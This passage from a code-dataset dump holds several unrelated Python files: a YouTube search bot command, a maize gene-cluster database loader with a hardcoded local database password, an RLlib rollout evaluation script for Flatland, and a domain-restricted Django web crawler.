msg.format(config.get_lang(clang, \"argument_query\"))\nelse:\n query = urllib.request.quote(args)\n url = url.format(query)\n res = urllib.request.urlopen(url)\n data = json.loads(res.read().decode())\n if not data[\"items\"]:\n msg = config.get_lang(clang, \"cant_found_video\")\n msg = msg.format(\"YouTube\", html.escape(args))\n else:\n item = data[\"items\"][0]\n if item[\"id\"][\"kind\"] == \"youtube#video\":\n video_id = item[\"id\"][\"videoId\"]\n video_title = item[\"snippet\"][\"title\"]\n channel_name = item[\"snippet\"][\"channelTitle\"]\n video_url = \"https://youtu.be/\" + video_id\n video_title = html.escape(video_title)\n channel_name = html.escape(channel_name)\n\n msg = config.get_lang(clang, \"found_video\")\n msg = msg.format(video_title, channel_name, video_url)\n elif item[\"id\"][\"kind\"] == \"youtube#playlist\":\n playlist_id = item[\"id\"][\"playlistId\"]\n playlist_title = item[\"snippet\"][\"title\"]\n playlist_url = (\n \"https://www.youtube.com/playlist?list=\"\n ) + playlist_id\n channel_name = item[\"snippet\"][\"channelTitle\"]\n\n playlist_title = html.escape(playlist_title)\n channel_name = html.escape(channel_name)\n\n msg = config.get_lang(clang, \"found_video\")\n msg = msg.format(playlist_title, channel_name, playlist_url)\n elif item[\"id\"][\"kind\"] == \"youtube#channel\":\n channel_id = item[\"id\"][\"channelId\"]\n channel_title = item[\"snippet\"][\"title\"]\n channel_thumb = item[\"snippet\"][\"thumbnails\"][\"default\"][\"url\"]\n channel_url = (\n \"https://www.youtube.com/channel/\"\n ) + channel_id\n msg = config.get_lang(clang, \"found_channel\")\n msg = msg.format(channel_title, channel_thumb, channel_url)\n else:\n msg = \"Unkown type \" + item[\"id\"][\"kind\"]\nroom.message(msg, html=True)\n","repo_name":"TheClonerx/thebotx","sub_path":"cmds/yt.py","file_name":"yt.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"10710974144","text":"#!/usr/bin/python\n\nimport sys\nfrom pathlib import Path\nfrom mu_illumina_v4 import Barcode, Cluster, GeneCoords, MaizeGene\nfrom Bio import SeqIO\nfrom progressbar import ProgressBar\nfrom BioSQL import BioSeqDatabase\n\nrun_id = sys.argv[1]\nclusters = Path(sys.argv[2])\ncounts = 0\nfor peaks in clusters.glob('**/*_nobg.peaks'):\n\twith peaks.open() as f:\n\t\twhile f.readline():\n\t\t\tcounts += 1\n\n#print(\"Indexing reference genome\")\n#maize_dict = SeqIO.index(sys.argv[3], \"fasta\")\nserver = BioSeqDatabase.open_database(driver=\"pymysql\", user=\"root\",\n passwd = \"420bigmoney\", host = \"localhost\", db=\"maizeseq\")\ndb = server[\"Zea_mays.AGPv4-GFF3\"]\n\nprint(\"Loading clusters\")\npbar = ProgressBar(max_value=counts).start()\ni = 0\nfor barcode in Barcode.select().where(Barcode.date == run_id):\n\tbc_dir = clusters / barcode.barcode\n\tfor peaks in bc_dir.glob(\"*_nobg.peaks\"):\n\t\tfor line in open(peaks):\n\t\t\tcols = line.strip().split()\n\t\t\tinsertion_start = 0\n\t\t\tinsertion_end = 0\n\t\t\tif(int(cols[6]) != 0): \n\t\t\t\tinsertion_start = int(cols[6]) - 5\n\t\t\t\tinsertion_end = int(cols[6]) + 5\n\t\t\trec = db.lookup(gi=cols[0])[int(cols[1]):int(cols[2])]\n\t\t\tgenes = set()\n\t\t\tfor gene in GeneCoords.select().where(GeneCoords.chr == cols[0]).where(GeneCoords.start < int(cols[1])).where(GeneCoords.end > int(cols[1])):\n\t\t\t\tgenes.add(gene.accession)\n\t\t\tfor gene in GeneCoords.select().where(GeneCoords.chr == cols[0]).where(GeneCoords.start < int(cols[2])).where(GeneCoords.end > int(cols[2])):\n\t\t\t\tgenes.add(gene.accession)\n\t\t\tfor gene in GeneCoords.select().where(GeneCoords.chr == cols[0]).where(GeneCoords.start > int(cols[1])).where(GeneCoords.end < int(cols[2])):\n\t\t\t\tgenes.add(gene.accession)\n\n\t\t\tcluster = Cluster.create(chr = cols[0], start = cols[1], end = cols[2], size = cols[3], insertion_start = insertion_start, insertion_end = insertion_end, barcode = barcode.id, seq = rec.seq, primer = \"\", maize = \"\", identified_gene = \"\")\n\t\t\ti += 1\n\t\t\tfor gene in genes:\n\t\t\t\tMaizeGene.create(accession = gene, cluster_id = cluster.id)\n\n\t\t\tpbar.update(i)\n\t\npbar.finish()\n","repo_name":"nickstiffler/Mu-Illumina","sub_path":"scripts/load_clusters.py","file_name":"load_clusters.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19482092938","text":"#!/usr/bin/env python\n\nimport argparse\nimport collections\nimport json\nimport logging\nimport os\nimport pickle\nimport shelve\nfrom pathlib import Path\n\nimport gym\nimport numpy as np\nimport ray\nfrom ray.rllib.agents.registry import get_agent_class\nfrom ray.rllib.env import MultiAgentEnv\nfrom ray.rllib.env.base_env import _DUMMY_AGENT_ID\nfrom ray.rllib.evaluation.episode import _flatten_action\nfrom ray.rllib.policy.sample_batch import DEFAULT_POLICY_ID\n#from ray.rllib.utils.space_utils import flatten_to_single_ndarray\nfrom ray.tune.utils import merge_dicts\n\nfrom utils.loader import load_envs, load_models\n\nlogger = logging.getLogger(__name__)\n\nEXAMPLE_USAGE = \"\"\"\nExample Usage:\n python rollout.py /Users/flaurent/Sites/flatland/flatland-checkpoints/checkpoint_940/checkpoint-940 --run APEX --no-render --episodes 1000 --env 'flatland_random_sparse_small' --config '{\"env_config\": {\"test\": \"true\", \"min_seed\": 1002, \"max_seed\": 213783, \"min_test_seed\": 0, \"max_test_seed\": 100, \"reset_env_freq\": \"1\", \"regenerate_rail_on_reset\": \"True\", \"regenerate_schedule_on_reset\": \"True\", \"observation\": \"tree\", \"observation_config\": {\"max_depth\": 2, \"shortest_path_max_depth\": 30}}, \"model\": {\"fcnet_activation\": \"relu\", \"fcnet_hiddens\": [256, 256], \"vf_share_layers\": \"True\"}}' \n\"\"\"\n\n\"\"\"\n# Testing in flatland_random_sparse_small:\npython rollout.py /Users/flaurent/Sites/flatland/flatland-checkpoints/checkpoint_940/checkpoint-940 --run APEX --no-render --episodes 1000 --env 'flatland_random_sparse_small' --config '{\"env_config\": {\"test\": \"true\", \"min_seed\": 1002, \"max_seed\": 213783, \"min_test_seed\": 0, \"max_test_seed\": 100, \"reset_env_freq\": \"1\", \"regenerate_rail_on_reset\": \"True\", \"regenerate_schedule_on_reset\": \"True\", \"observation\": \"tree\", \"observation_config\": {\"max_depth\": 2, \"shortest_path_max_depth\": 30}}, \"model\": {\"fcnet_activation\": \"relu\", \"fcnet_hiddens\": [256, 256], \"vf_share_layers\": \"True\"}}' \n\n# Testing in flatland_sparse:\npython rollout.py /Users/flaurent/Sites/flatland/flatland-checkpoints/checkpoint_940/checkpoint-940 --run APEX --no-render --episodes 1000 --env 'flatland_sparse' --config '{\"env_config\": {\"test\": \"true\", \"generator\": \"sparse_rail_generator\", \"generator_config\": \"small_v0\", \"observation\": \"tree\", \"observation_config\": {\"max_depth\": 2, \"shortest_path_max_depth\": 30}}, \"model\": {\"fcnet_activation\": \"relu\", \"fcnet_hiddens\": [256, 256], \"vf_share_layers\": \"True\"}}' \n\"\"\"\n\n# Register all necessary assets in tune registries\nload_envs(os.getcwd()) # Load envs\nload_models(os.getcwd()) # Load models\n\n\nclass RolloutSaver:\n \"\"\"Utility class for storing rollouts.\n\n Currently supports two behaviours: the original, which\n simply dumps everything to a pickle file once complete,\n and a mode which stores each rollout as an entry in a Python\n shelf db file. The latter mode is more robust to memory problems\n or crashes part-way through the rollout generation. Each rollout\n is stored with a key based on the episode number (0-indexed),\n and the number of episodes is stored with the key \"num_episodes\",\n so to load the shelf file, use something like:\n\n with shelve.open('rollouts.pkl') as rollouts:\n for episode_index in range(rollouts[\"num_episodes\"]):\n rollout = rollouts[str(episode_index)]\n\n If outfile is None, this class does nothing.\n \"\"\"\n\n def __init__(self,\n outfile=None,\n use_shelve=False,\n write_update_file=False,\n target_steps=None,\n target_episodes=None,\n save_info=False):\n self._outfile = outfile\n self._update_file = None\n self._use_shelve = use_shelve\n self._write_update_file = write_update_file\n self._shelf = None\n self._num_episodes = 0\n self._rollouts = []\n self._current_rollout = []\n self._total_steps = 0\n self._target_episodes = target_episodes\n self._target_steps = target_steps\n self._save_info = save_info\n\n def _get_tmp_progress_filename(self):\n outpath = Path(self._outfile)\n return outpath.parent / (\"__progress_\" + outpath.name)\n\n @property\n def outfile(self):\n return self._outfile\n\n def __enter__(self):\n if self._outfile:\n if self._use_shelve:\n # Open a shelf file to store each rollout as they come in\n self._shelf = shelve.open(self._outfile)\n else:\n # Original behaviour - keep all rollouts in memory and save\n # them all at the end.\n # But check we can actually write to the outfile before going\n # through the effort of generating the rollouts:\n try:\n with open(self._outfile, \"wb\") as _:\n pass\n except IOError as x:\n print(\"Can not open {} for writing - cancelling rollouts.\".\n format(self._outfile))\n raise x\n if self._write_update_file:\n # Open a file to track rollout progress:\n self._update_file = self._get_tmp_progress_filename().open(\n mode=\"w\")\n return self\n\n def __exit__(self, type, value, traceback):\n if self._shelf:\n # Close the shelf file, and store the number of episodes for ease\n self._shelf[\"num_episodes\"] = self._num_episodes\n self._shelf.close()\n elif self._outfile and not self._use_shelve:\n # Dump everything as one big pickle:\n pickle.dump(self._rollouts, open(self._outfile, \"wb\"))\n if self._update_file:\n # Remove the temp progress file:\n self._get_tmp_progress_filename().unlink()\n self._update_file = None\n\n def _get_progress(self):\n if self._target_episodes:\n return \"{} / {} episodes completed\".format(self._num_episodes,\n self._target_episodes)\n elif self._target_steps:\n return \"{} / {} steps completed\".format(self._total_steps,\n self._target_steps)\n else:\n return \"{} episodes completed\".format(self._num_episodes)\n\n def begin_rollout(self):\n self._current_rollout = []\n\n def end_rollout(self):\n if self._outfile:\n if self._use_shelve:\n # Save this episode as a new entry in the shelf database,\n # using the episode number as the key.\n self._shelf[str(self._num_episodes)] = self._current_rollout\n else:\n # Append this rollout to our list, to save laer.\n self._rollouts.append(self._current_rollout)\n self._num_episodes += 1\n if self._update_file:\n self._update_file.seek(0)\n self._update_file.write(self._get_progress() + \"\\n\")\n self._update_file.flush()\n\n def append_step(self, obs, action, next_obs, reward, done, info):\n \"\"\"Add a step to the current rollout, if we are saving them\"\"\"\n if self._outfile:\n if self._save_info:\n self._current_rollout.append(\n [obs, action, next_obs, reward, done, info])\n else:\n self._current_rollout.append(\n [obs, action, next_obs, reward, done])\n self._total_steps += 1\n\n\ndef create_parser(parser_creator=None):\n parser_creator = parser_creator or argparse.ArgumentParser\n parser = parser_creator(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description=\"Roll out a reinforcement learning agent \"\n \"given a checkpoint.\",\n epilog=EXAMPLE_USAGE)\n\n parser.add_argument(\n \"checkpoint\", type=str, help=\"Checkpoint from which to roll out.\")\n required_named = parser.add_argument_group(\"required named arguments\")\n required_named.add_argument(\n \"--run\",\n type=str,\n required=True,\n help=\"The algorithm or model to train. This may refer to the name \"\n \"of a built-on algorithm (e.g. RLLib's DQN or PPO), or a \"\n \"user-defined trainable function or class registered in the \"\n \"tune registry.\")\n required_named.add_argument(\n \"--env\", type=str, help=\"The gym environment to use.\")\n parser.add_argument(\n \"--no-render\",\n default=False,\n action=\"store_const\",\n const=True,\n help=\"Surpress rendering of the environment.\")\n parser.add_argument(\n \"--monitor\",\n default=False,\n action=\"store_const\",\n const=True,\n help=\"Wrap environment in gym Monitor to record video.\")\n parser.add_argument(\n \"--steps\", default=10000, help=\"Number of steps to roll out.\")\n parser.add_argument(\"--out\", default=None, help=\"Output filename.\")\n parser.add_argument(\n \"--config\",\n default=\"{}\",\n type=json.loads,\n help=\"Algorithm-specific configuration (e.g. env, hyperparams). \"\n \"Surpresses loading of configuration from checkpoint.\")\n parser.add_argument(\n \"--episodes\",\n default=0,\n help=\"Number of complete episodes to roll out. (Overrides --steps)\")\n parser.add_argument(\n \"--save-info\",\n default=False,\n action=\"store_true\",\n help=\"Save the info field generated by the step() method, \"\n \"as well as the action, observations, rewards and done fields.\")\n parser.add_argument(\n \"--use-shelve\",\n default=False,\n action=\"store_true\",\n help=\"Save rollouts into a python shelf file (will save each episode \"\n \"as it is generated). An output filename must be set using --out.\")\n parser.add_argument(\n \"--track-progress\",\n default=False,\n action=\"store_true\",\n help=\"Write progress to a temporary file (updated \"\n \"after each episode). An output filename must be set using --out; \"\n \"the progress file will live in the same folder.\")\n return parser\n\n\ndef run(args, parser):\n config = {}\n # Load configuration from file\n config_dir = os.path.dirname(args.checkpoint)\n config_path = os.path.join(config_dir, \"params.pkl\")\n if not os.path.exists(config_path):\n config_path = os.path.join(config_dir, \"../params.pkl\")\n if not os.path.exists(config_path):\n if not args.config:\n raise ValueError(\n \"Could not find params.pkl in either the checkpoint dir or \"\n \"its parent directory.\")\n else:\n with open(config_path, \"rb\") as f:\n config = pickle.load(f)\n if \"num_workers\" in config:\n config[\"num_workers\"] = min(2, config[\"num_workers\"])\n config = merge_dicts(config, args.config)\n if not args.env:\n if not config.get(\"env\"):\n parser.error(\"the following arguments are required: --env\")\n args.env = config.get(\"env\")\n\n ray.init()\n\n cls = get_agent_class(args.run)\n agent = cls(env=args.env, config=config)\n agent.restore(args.checkpoint)\n num_steps = int(args.steps)\n num_episodes = int(args.episodes)\n with RolloutSaver(\n args.out,\n args.use_shelve,\n write_update_file=args.track_progress,\n target_steps=num_steps,\n target_episodes=num_episodes,\n save_info=args.save_info) as saver:\n outcome = rollout(agent, args.env, num_steps, num_episodes, saver,\n args.no_render, args.monitor)\n outcome_file = os.path.join(os.path.dirname(config_path), 'test_outcome.json')\n with open(outcome_file, 'w') as f:\n json.dump(outcome, f, indent=4)\n\n\nclass DefaultMapping(collections.defaultdict):\n \"\"\"default_factory now takes as an argument the missing key.\"\"\"\n\n def __missing__(self, key):\n self[key] = value = self.default_factory(key)\n return value\n\n\ndef default_policy_agent_mapping(unused_agent_id):\n return DEFAULT_POLICY_ID\n\n\ndef keep_going(steps, num_steps, episodes, num_episodes):\n \"\"\"Determine whether we've collected enough data\"\"\"\n # if num_episodes is set, this overrides num_steps\n if num_episodes:\n return episodes < num_episodes\n # if num_steps is set, continue until we reach the limit\n if num_steps:\n return steps < num_steps\n # otherwise keep going forever\n return True\n\n\ndef rollout(agent,\n env_name,\n num_steps,\n num_episodes=0,\n saver=None,\n no_render=True,\n monitor=False):\n policy_agent_mapping = default_policy_agent_mapping\n\n if saver is None:\n saver = RolloutSaver()\n\n if hasattr(agent, \"workers\"):\n env = agent.workers.local_worker().env\n multiagent = isinstance(env, MultiAgentEnv)\n if agent.workers.local_worker().multiagent:\n policy_agent_mapping = agent.config[\"multiagent\"][\n \"policy_mapping_fn\"]\n\n policy_map = agent.workers.local_worker().policy_map\n state_init = {p: m.get_initial_state() for p, m in policy_map.items()}\n use_lstm = {p: len(s) > 0 for p, s in state_init.items()}\n action_init = {\n #p: flatten_to_single_ndarray(m.action_space.sample()) # ray 0.8.5\n p: _flatten_action(m.action_space.sample()) # ray 0.8.4\n for p, m in policy_map.items()\n }\n else:\n env = gym.make(env_name)\n multiagent = False\n use_lstm = {DEFAULT_POLICY_ID: False}\n\n if monitor and not no_render and saver and saver.outfile is not None:\n # If monitoring has been requested,\n # manually wrap our environment with a gym monitor\n # which is set to record every episode.\n env = gym.wrappers.Monitor(\n env, os.path.join(os.path.dirname(saver.outfile), \"monitor\"),\n lambda x: True)\n\n steps = 0\n episodes = 0\n simulation_rewards = []\n simulation_rewards_normalized = []\n simulation_percentage_complete = []\n simulation_steps = []\n\n while keep_going(steps, num_steps, episodes, num_episodes):\n mapping_cache = {} # in case policy_agent_mapping is stochastic\n saver.begin_rollout()\n obs = env.reset()\n agent_states = DefaultMapping(\n lambda agent_id: state_init[mapping_cache[agent_id]])\n prev_actions = DefaultMapping(\n lambda agent_id: action_init[mapping_cache[agent_id]])\n prev_rewards = collections.defaultdict(lambda: 0.)\n done = False\n reward_total = 0.0\n\n episode_steps = 0\n episode_max_steps = 0\n episode_num_agents = 0\n agents_score = collections.defaultdict(lambda: 0.)\n agents_done = set()\n\n while not done and keep_going(steps, num_steps, episodes,\n num_episodes):\n multi_obs = obs if multiagent else {_DUMMY_AGENT_ID: obs}\n action_dict = {}\n for agent_id, a_obs in multi_obs.items():\n if a_obs is not None:\n policy_id = mapping_cache.setdefault(\n agent_id, policy_agent_mapping(agent_id))\n p_use_lstm = use_lstm[policy_id]\n if p_use_lstm:\n a_action, p_state, _ = agent.compute_action(\n a_obs,\n state=agent_states[agent_id],\n prev_action=prev_actions[agent_id],\n prev_reward=prev_rewards[agent_id],\n policy_id=policy_id)\n agent_states[agent_id] = p_state\n else:\n a_action = agent.compute_action(\n a_obs,\n prev_action=prev_actions[agent_id],\n prev_reward=prev_rewards[agent_id],\n policy_id=policy_id)\n #a_action = flatten_to_single_ndarray(a_action) # ray 0.8.5\n a_action = _flatten_action(a_action) # tuple actions # ray 0.8.4\n action_dict[agent_id] = a_action\n prev_actions[agent_id] = a_action\n action = action_dict\n\n action = action if multiagent else action[_DUMMY_AGENT_ID]\n next_obs, reward, done, info = env.step(action)\n if multiagent:\n for agent_id, r in reward.items():\n prev_rewards[agent_id] = r\n else:\n prev_rewards[_DUMMY_AGENT_ID] = reward\n\n if multiagent:\n done = done[\"__all__\"]\n reward_total += sum(reward.values())\n else:\n reward_total += reward\n if not no_render:\n env.render()\n saver.append_step(obs, action, next_obs, reward, done, info)\n steps += 1\n obs = next_obs\n\n for agent_id, agent_info in info.items():\n if episode_max_steps == 0:\n episode_max_steps = agent_info[\"max_episode_steps\"]\n episode_num_agents = agent_info[\"num_agents\"]\n episode_steps = max(episode_steps, agent_info[\"agent_step\"])\n agents_score[agent_id] = agent_info[\"agent_score\"]\n if agent_info[\"agent_done\"]:\n agents_done.add(agent_id)\n\n episode_score = sum(agents_score.values())\n simulation_rewards.append(episode_score)\n simulation_rewards_normalized.append(episode_score / (episode_max_steps + episode_num_agents))\n simulation_percentage_complete.append(float(len(agents_done)) / episode_num_agents)\n simulation_steps.append(episode_steps)\n\n saver.end_rollout()\n print(f\"Episode #{episodes}: \"\n f\"score: {episode_score:.2f} \"\n f\"({np.mean(simulation_rewards):.2f}), \"\n f\"normalized score: {simulation_rewards_normalized[-1]:.2f} \"\n f\"({np.mean(simulation_rewards_normalized):.2f}), \"\n f\"percentage_complete: {simulation_percentage_complete[-1]:.2f} \"\n f\"({np.mean(simulation_percentage_complete):.2f})\")\n if done:\n episodes += 1\n\n print(\"Evaluation completed:\\n\"\n f\"Episodes: {episodes}\\n\"\n f\"Mean Reward: {np.round(np.mean(simulation_rewards))}\\n\"\n f\"Mean Normalized Reward: {np.round(np.mean(simulation_rewards_normalized))}\\n\"\n f\"Mean Percentage Complete: {np.round(np.mean(simulation_percentage_complete), 3)}\\n\"\n f\"Mean Steps: {np.round(np.mean(simulation_steps), 2)}\")\n\n return {\n 'reward': [float(r) for r in simulation_rewards],\n 'reward_mean': np.mean(simulation_rewards),\n 'reward_std': np.std(simulation_rewards),\n 'normalized_reward': [float(r) for r in simulation_rewards_normalized],\n 'normalized_reward_mean': np.mean(simulation_rewards_normalized),\n 'normalized_reward_std': np.std(simulation_rewards_normalized),\n 'percentage_complete': [float(c) for c in simulation_percentage_complete],\n 'percentage_complete_mean': np.mean(simulation_percentage_complete),\n 'percentage_complete_std': np.std(simulation_percentage_complete),\n 'steps': [float(c) for c in simulation_steps],\n 'steps_mean': np.mean(simulation_steps),\n 'steps_std': np.std(simulation_steps),\n }\n\n\nif __name__ == \"__main__\":\n parser = create_parser()\n args = parser.parse_args()\n run(args, parser)\n","repo_name":"AIcrowd/neurips2020-flatland-baselines","sub_path":"rollout.py","file_name":"rollout.py","file_ext":"py","file_size_in_byte":19666,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"19170171300","text":"import requests\nfrom bs4 import BeautifulSoup, Comment\nimport re\nimport datetime\nfrom urllib.parse import urljoin\nfrom core.models import Keywords, Urls, Favicons, UrlCategory, RootDomain\nfrom random import shuffle\nimport joblib\n\ndef scrap(url: str):\n if isUrlAllowed(url) == False:\n return (None, None, None, None, None, None)\n try:\n page = requests.get(url, timeout = 10)\n except:\n return (None, None, None, None, None, None)\n if page.status_code != 200:\n print(\"Error: \", page.status_code)\n return (None, None, None, None, None, None)\n docParser = ''\n if url[-4:] == '.pdf' or url[-4:] == '.doc' or url[-5:] == '.docx' or url[-4:] == '.ppt' or url[-5:] == '.pptx' or url[-4:] == '.xls' or url[-5:] == '.xlsx':\n docParser = 'lxml'\n content = page.content\n else:\n docParser = 'html.parser'\n content = page.text\n\n soup = BeautifulSoup(content, docParser)\n \n # using Set data structure to store all urls on this page and avoid duplication\n urls_found_on_this_page = set()\n for link in soup.find_all('a', href = True):\n found_url = str(link.get('href'))\n if len(found_url) > 0:\n if found_url[0] == \"/\":\n found_url = urljoin(url,found_url)\n if found_url != url and re.match(url_regex, found_url) is not None:\n urls_found_on_this_page.add(found_url)\n \n urls_found_on_this_page = list(urls_found_on_this_page)\n\n keywords = []\n \n if soup.find_all('meta', attrs={'name':'description'}):\n scrapped_desc = soup.find('meta', attrs={'name':'description'}).get(\"content\")\n keywords.append(scrapped_desc)\n page_description = soup.find('meta', attrs={'name':'description'}).get(\"content\")\n else:\n page_description = None\n\n # add headings to keywords\n headings = soup.find_all(['h1', 'h2', 'h3', 'h4', 'h5', 'h6'])\n for heading in headings:\n keywords.append(str(heading.text).strip())\n if page_description == None:\n if headings:\n page_description = headings[0].text.strip()\n else:\n page_description = text_from_html(content)[:pageDescriptionCharLimit]\n\n # add title to keywords and save page title\n page_title = None\n titles = soup.find_all('title')\n for title in titles:\n keywords.append(str(title.text).strip())\n\n if len(titles) == 0:\n page_title = text_from_html(content)[:pageTitleCharLimit]\n else:\n page_title = titles[0].text.strip()\n\n iconLink = getFavicon(url, soup)\n\n # categorize url based on its content\n urlCategory = joblib.load('core/static/core/website_category_detection_model.joblib').predict([text_from_html(content[:2500])])[0]\n\n return (keywords, page_title, page_description, iconLink, urls_found_on_this_page, urlCategory)\n\n\n\ndef store(url, keywords, urls_found_on_this_page, title, description, iconLink, urlCategory):\n # saving current url to db if not already saved, and getting its reference, later mapping it with keywords and updating its last_scrapped value\n url_row, created_url_obj = Urls.objects.get_or_create(address = url)\n #delete keywords feild entry as some keywords may no longer be in page so start afresh\n url_row.keywords_in_it.clear()\n # update or create title, description, iconLink and category\n url_row.page_title = title[:pageTitleCharLimit]\n url_row.page_description = description[:pageDescriptionCharLimit]\n favicon_row = Favicons.objects.get_or_create(icon_link = iconLink)\n url_row.icon_link = str(favicon_row[0].id)\n url_row.category = UrlCategory.objects.get_or_create(category_name = urlCategory)[0].id\n # save keywords to database model Keywords and relate it with current url by many-to-many relationship\n for keyword in keywords:\n keyword = keyword.strip()\n if keyword:\n keyword_row, created_keyword_obj = Keywords.objects.get_or_create(keyword_string = keyword)\n url_row.keywords_in_it.add(keyword_row) # Adding a second time is OK, it will not duplicate the relation\n\n # create entries for all links found in page, and increment their num_of_refs if this url is not earlier scrapped\n # i.e increment iff current url is not yet scrapped and link is already present in db (as default is 1)\n # not yet scrapped can be determined by last_scrapped being datetime.datetime.min\n for link in urls_found_on_this_page:\n if isUrlAllowed(link):\n link_row, created_link_obj = Urls.objects.get_or_create(address = link)\n if (not created_link_obj) and url_row.last_scrapped == datetime.datetime.min:\n link_row.num_of_refs += 1\n link_row.save()\n \n url_row.last_scrapped = datetime.datetime.utcnow()\n url_row.save()\n\ndef getFavicon(url, soup):\n icon_link = soup.find(\"link\", rel=\"shortcut icon\")\n if icon_link is None:\n icon_link = soup.find(\"link\", rel=\"icon\")\n if icon_link is None:\n return getBaseUrl(url) + '/favicon.ico'\n if not icon_link[\"href\"].startswith(\"http\"):\n return urljoin(getBaseUrl(url),icon_link[\"href\"])\n return icon_link[\"href\"]\n\ndef getBaseUrl(url):\n return re.match(r'^(?:http|ftp)s?://' # http:// or https://\n r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\\.)+(?:[A-Z]{2,6}\\.?|[A-Z0-9-]{2,}\\.?)|' #domain...\n r'localhost|' #localhost...\n r'\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})' # ...or ip\n r'(?::\\d+)?' # optional port\n r'(?:/?|[/?]\\S+)$', url, re.IGNORECASE).group(0)\n\ndef get_url_regex():\n # regex for checking if valid url\n #source: https://stackoverflow.com/a/7160778/12312757\n return re.compile(\n r'^(?:http|ftp)s?://' # http:// or https://\n r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\\.)+(?:[A-Z]{2,6}\\.?|[A-Z0-9-]{2,}\\.?)|' #domain...\n r'localhost|' #localhost...\n r'\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})' # ...or ip\n r'(?::\\d+)?' # optional port\n r'(?:/?|[/?]\\S+)$', re.IGNORECASE)\n\ndef tag_visible(element):\n if element.parent.name in ['style', 'script', 'head', 'title', 'meta', '[document]']:\n return False\n if isinstance(element, Comment):\n return False\n return True\n\n\ndef text_from_html(body):\n soup = BeautifulSoup(body, 'html.parser')\n texts = soup.findAll(text=True)\n visible_texts = filter(tag_visible, texts) \n return u\" \".join(t.strip() for t in visible_texts)\n\ndef getUrlsFromSitemap(sitemapUrl):\n urls = []\n sitemap = requests.get(sitemapUrl)\n if sitemap.status_code == 200:\n soup = BeautifulSoup(sitemap.content, 'xml')\n for url in soup.find_all('url'):\n urls.append(url.find('loc').text)\n return urls\n\ndef isUrlAllowed(url):\n allowed_domains = [rootDomain, \"https://isc.charusat.ac.in\", \"https://charusat.edu.in:912/\"]\n url = url.strip().lower()\n if url[-4:] == '.pdf' or url[-4:] == '.doc' or url[-5:] == '.docx' or url[-4:] == '.ppt' or url[-5:] == '.pptx' or url[-4:] == '.xls' or url[-5:] == '.xlsx':\n return False # return None if url is a document as currently we are not supporting documents\n if url[-4:] == '.jpg' or url[-4:] == '.png' or url[-4:] == '.gif' or url[-4:] == '.svg' or url[-4:] == '.bmp' or url[-4:] == '.ico':\n return False\n if url[-4:] == '.mp3' or url[-4:] == '.mp4' or url[-4:] == '.wav' or url[-4:] == '.avi' or url[-4:] == '.flv' or url[-4:] == '.wmv':\n return False\n if url[-4:] == '.zip' or url[-4:] == '.rar' or url[-4:] == '.7z' or url[-4:] == '.tar' or url[-4:] == '.gz' or url[-4:] == '.bz2':\n return False\n if url[-4:] == '.exe' or url[-4:] == '.msi' or url[-4:] == '.apk' or url[-4:] == '.dmg' or url[-4:] == '.deb' or url[-4:] == '.rpm':\n return False\n if url[-4:] == '.ttf' or url[-4:] == '.otf' or url[-4:] == '.woff' or url[-4:] == '.woff2' or url[-4:] == '.eot':\n return False\n if url[-4:] == '.css' or url[-3:] == '.js':\n return False\n if url[-4:] == '.xml' or url[-4:] == '.rss':\n return False\n if url[-4:] == '.csv' or url[-4:] == '.txt' or url[-4:] == '.log':\n return False\n \n if domainRestricted:\n flag = False\n for domain in allowed_domains:\n if url.find(domain) == 0:\n flag = True\n return flag\n \n return True\n\n\nif __name__ == \"django.core.management.commands.shell\":\n url_regex = get_url_regex()\n pageTitleCharLimit = 60\n pageDescriptionCharLimit = 140\n maxUrlsToScrapInSession = 10\n urlsScrappedInSession = 0\n scrapIntervalInDays = 3\n manualAddition = True\n domainRestricted = True\n parseSitemap = True\n rootDomain = \"https://charusat.ac.in/\"\n rootTitle = \"Charotar University of Science and Technology\"\n sitemapUrl = \"https://charusat.ac.in/sitemap.xml\"\n\n if domainRestricted:\n RootDomain.objects.all().delete()\n record, created_now = RootDomain.objects.get_or_create(root_url = rootDomain)\n record.root_title = rootTitle\n record.save()\n\n print(\"[ + ] Initializing crawler!\")\n print(\"[ + ] Scraping {0} urls in this session which are not scrapped in the last {1} days.\".format(maxUrlsToScrapInSession, scrapIntervalInDays))\n print(\"-------------------------------------------\\n\")\n\n if domainRestricted and parseSitemap:\n print(\"[ + ] Parsing sitemap for urls in domain '{0}'\".format(rootDomain))\n urlsInSitemap = getUrlsFromSitemap(sitemapUrl)\n print(\"[ + ] Found {0} urls in sitemap.\".format(len(urlsInSitemap)))\n urlsAddedFromSitemap = 0\n for url in urlsInSitemap:\n if isUrlAllowed(url):\n link_row, created_link_obj = Urls.objects.get_or_create(address = url)\n if created_link_obj:\n link_row.num_of_refs = 0\n link_row.save()\n urlsAddedFromSitemap += 1\n print(\"[ + ] Added {0} urls to database from sitemap.\".format(urlsAddedFromSitemap))\n\n if manualAddition:\n url_to_scrap = \"https://charusat.ac.in/\"\n keywords_found_on_this_page, page_title, page_description, iconLink, urls_found_on_this_page, category = scrap(url_to_scrap)\n if (keywords_found_on_this_page, urls_found_on_this_page) == (None, None):\n print(\"[ - ] The manual addition URL '{0}' cannot be scrapped.\".format(url_to_scrap))\n else:\n store(url_to_scrap, keywords_found_on_this_page, urls_found_on_this_page, page_title, page_description, iconLink, category)\n urlsScrappedInSession += 1\n print(\"[ + ] Crawled ({0}/{1}) URL: {2}\".format(urlsScrappedInSession,maxUrlsToScrapInSession,url_to_scrap))\n\n while urlsScrappedInSession < maxUrlsToScrapInSession:\n to_scrap_urls = list(Urls.objects.filter(last_scrapped__lt = (datetime.datetime.utcnow() - datetime.timedelta(days = scrapIntervalInDays))))\n if len(to_scrap_urls) == 0:\n print(\"[ - ] No URLs to scrap currenty. Try changing scrap conditions or manually add new URLs.\")\n break\n shuffle(to_scrap_urls) # shuffling to ge more diversified results\n for i in range(len(to_scrap_urls)):\n url_object = to_scrap_urls[i]\n 